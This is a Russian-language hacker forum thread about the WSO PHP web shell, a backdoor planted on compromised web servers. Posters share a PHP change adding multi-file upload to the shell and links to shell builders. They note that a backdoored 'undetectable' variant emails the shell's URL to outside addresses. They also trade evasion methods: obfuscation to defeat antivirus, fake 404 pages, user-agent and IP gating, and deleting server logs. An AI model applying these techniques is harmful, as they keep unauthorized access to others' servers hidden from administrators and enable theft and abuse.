а после, в выпадающем меню, где выбирали за архивировать, появляется строчка Paste, ее нужно клацнуть!
Выбираю compress (пробовал и zip и tar.gz) Появляется строка с именем файла: wso_20150321_184812.zip Жму на кнопку >> Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>. Ничего не происходит, архив не появляется.
при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка Paste, ее обязательно надо указать, а потом щелкайте по кнопе >>
Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда: Правим input аплоада HTML: <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> Далее строка примерно 522 PHP: case 'uploadFile':........break; Заменяем там блок на PHP: case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break;
https://code.google.com/p/wso-web-shell-2-8/ Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён. А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее. Или это противоречит политике GitHub?
Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой. Скриптом отправляется 2 письма на следующие адреса: [email protected], [email protected] Spoiler: Письмо 1 X-Sendmail-Cmdline: sendmail.pl -t -i To: [email protected] Subject: array localhost/WSO2.8_undetectable.php X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code localhost/WSO2.8_undetectable.php Spoiler: Письмо 2 X-Sendmail-Cmdline: sendmail.pl -t -i To: [email protected] Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1 X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1<br>
Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2? Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?
Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.
Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы. 1) Code: -/* WSO 2.1 (Web Shell by oRb) */ +/* WSO 2.2.0 (Web Shell by oRb) */ 2) Code: -/* WSO 2.2.0 (Web Shell by oRb) */ +/* WSO 2.2.0 (Web Shell by Pirat) */ 3) Code: -/* WSO 2.2.0 (Web Shell by Pirat) */ +/* WSO 2.2.0 (Web Shell by HARD _LINUX) */ 4) Code: -$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; +$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin 5) Code: -$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin +$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; PS Для чего была вставлена строка?
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
http://kronus.me/cn/wso-builder/1.04/ понравилась онлайн версия билдера wso возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5) и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов
